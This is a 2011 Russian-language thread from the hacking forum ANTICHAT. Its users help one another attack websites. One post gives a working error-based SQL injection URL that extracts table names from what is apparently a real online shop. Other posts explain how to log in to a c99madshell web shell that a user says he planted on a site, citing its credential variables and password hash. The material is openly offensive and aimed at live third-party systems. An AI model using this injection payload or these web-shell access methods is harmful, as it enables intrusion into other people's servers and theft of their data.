ANTICHAT Forum
HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
НОВЫЕ ТОРГОВАЯ НОВОСТИ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 26.07.2011, 23:16
ZARO
Познающий
Регистрация: 17.04.2009
Сообщений: 59
С нами: 8982831

Репутация: 37
По умолчанию

Стоит phpMyAdmin 2.11.10

Можно ли как нибудь раскрыть пути?
 
Ответить с цитированием

  #2  
Старый 26.07.2011, 23:17
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами: 9642449

Репутация: 606


По умолчанию

Цитата:
Сообщение от Nolen88  
Помогите разобраться с авторизацией в c99madshell - Web shell. Шелл залит по адресу http://site.ru/faq.php
вот кусок кода из шелла про авторизацию
$login = "2";
$pass = "2";
$md5_pass = "c81e728d9d4c2f636f067f89cc14862c";
не могу понять правильный синтаксис авторизации, как ввести пароль и логин чтобы шелл пустил? А то приходится удалять эти строки и сидеть без авторизации(. Заранее спасибо за совет.
$login = "root";

$md5_pass = "c81e728d9d4c2f636f067f89cc14862c";

логин root

пасс 2
 
Ответить с цитированием

  #3  
Старый 27.07.2011, 01:01
FlaktW
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
С нами: 8803961

Репутация: 8
По умолчанию

Как насчет этой скули?

Цитата:
Сообщение от None  
http://bookmail.ru/shop/product/id/4380'
Как ее крутить?
 
Ответить с цитированием

  #4  
Старый 27.07.2011, 01:03
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 546
С нами: 8885780

Репутация: 672


По умолчанию

Цитата:
Сообщение от FlaktW  
Как насчет этой скули?
Как ее крутить?
как то так

http://bookmail.ru/shop/product/id/4380'+or+(select+count(*)from(select+1+union+selec t+2+union+select+3)x+group+by+concat(mid((select+t able_name+from+information_schema.tables+limit+0,1 ),1,64),floor(rand(0)*2)))+and+'1
 
Ответить с цитированием

  #5  
Старый 27.07.2011, 01:07
FlaktW
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
С нами: 8803961

Репутация: 8
По умолчанию

Цитата:
Сообщение от Konqi  
как то так
http://bookmail.ru/shop/product/id/4380'+or+(select+count(*)from(select+1+union+selec t+2+union+select+3)x+group+by+concat(mid((select+t able_name+from+information_schema.tables+limit+0,1 ),1,64),floor(rand(0)*2)))+and+'1
Это круто!
 
Ответить с цитированием

  #6  
Старый 27.07.2011, 05:03
Nolen88
Новичок
Регистрация: 26.07.2011
Сообщений: 5
С нами: 7788566

Репутация: 0
По умолчанию

Цитата:
Сообщение от попугай  
$login = "root";
$md5_pass = "c81e728d9d4c2f636f067f89cc14862c";
логин root
пасс 2
Цитата:
Сообщение от winstrool  
воспользуйся шеллом WSO самый простой и удобный шелл
Что то вы или невнимательно меня прочли или одно из двух, я не спрашиваю какой шелл мне лучше использовать потому что залит уже этот. Я не спрашиваю какой логин мне лучше использовать мне нужно объяснить как прописать в строке браузера логин и пароль чтобы шелл меня пустил, вот и все. Шелл лежит по адресу www.site.ru/faq.php
 
Ответить с цитированием

  #7  
Старый 27.07.2011, 05:31
AnGeI
Участник форума
Регистрация: 08.12.2008
Сообщений: 164
С нами: 9170186

Репутация: 54
По умолчанию

Цитата:
Сообщение от Nolen88  
мне нужно объяснить как прописать в строке браузера логин и пароль чтобы шелл меня пустил, вот и все. Шелл лежит по адресу www.site.ru/faq.php


Нету никаких логинов, только пароль. Он передается через POST, если изменить на GET или REQUEST, то можно использовать: www.site.ru/faq.php?pass=qwerty
 
Ответить с цитированием

  #8  
Старый 27.07.2011, 05:52
Nolen88
Новичок
Регистрация: 26.07.2011
Сообщений: 5
С нами: 7788566

Репутация: 0
По умолчанию

Цитата:
Сообщение от AnGeI  

Нету никаких логинов, только пароль. Он передается через POST, если изменить на GET или REQUEST, то можно использовать: www.site.ru/faq.php?pass=qwerty
Вы издеваетесь? Я говорю шелл уже залит и поздняк метатся, нужно просто понять как он авторизуется, ведь авторизация в нем уже есть, просто я не знаю как в нее войти, c99madshell очень популярный шелл неужели никто им не пользовался?
 
Ответить с цитированием

  #9  
Старый 27.07.2011, 07:36
d1v
Новичок
Регистрация: 21.02.2009
Сообщений: 3
С нами: 9061916

Репутация: 0
По умолчанию

Цитата:
Сообщение от Nolen88  
Помогите разобраться с авторизацией в c99madshell - Web shell. Шелл залит по адресу http://site.ru/faq.php
вот кусок кода из шелла про авторизацию
$login = "2";
$pass = "2";
$md5_pass = "c81e728d9d4c2f636f067f89cc14862c";
не могу понять правильный синтаксис авторизации, как ввести пароль и логин чтобы шелл пустил? А то приходится удалять эти строки и сидеть без авторизации(. Заранее спасибо за совет.
$login = "2"; // ЛОГИН (С) К.О.

$pass = "2"; //ПАРОЛЬ (С) К.О

$md5_pass = "c81e728d9d4c2f636f067f89cc14862c"; //ХЕШ ПАРОЛЯ (С) К.О.

Если хеш стоит, то приоритет будет у $md5_pass, а не $pass, т.е. при авторизации будет использоваться захешированный пароль, а не тот который в plaintext.
 
Ответить с цитированием

  #10  
Старый 27.07.2011, 07:49
Nolen88
Новичок
Регистрация: 26.07.2011
Сообщений: 5
С нами: 7788566

Репутация: 0
По умолчанию

Цитата:
Сообщение от d1v  
$login = "2"; // ЛОГИН (С) К.О.
$pass = "2"; //ПАРОЛЬ (С) К.О
$md5_pass = "c81e728d9d4c2f636f067f89cc14862c"; //ХЕШ ПАРОЛЯ (С) К.О.
Если хеш стоит, то приоритет будет у $md5_pass, а не $pass, т.е. при авторизации будет использоваться захешированный пароль, а не тот который в plaintext.
Извените накипело просто ВЫ наркоманы шоле? Или вы просто посты набиваете и вам лишь бы сказать что нибудь? Я ЗНАЮ ЧТО ПАРОЛЬ 2, ЗНАЮ ЧТО ЛОГИН 2, знаю что хеш пароль 2, я сам это вписал. Я ЗНАЮ ЧТО приоритет будет у $md5_pass. Я разве спросил вас Какой у меня пароль? Я напрямую спрашиваю как вводить логин и пароль чтобы шелл принял его??? И жду ВОТ ТАКОГО ОТВЕТА: Пароль для авторизации нужно водить вот таким синтаксисом - http://site.com/faq.php?pass=c81e728d9d4c2f636f067f89cc14862c - это кстати неправильный вариант. Кто нибудь умеет авторизоваться в с99?
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 10 (пользователей: 0 , гостей: 10)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.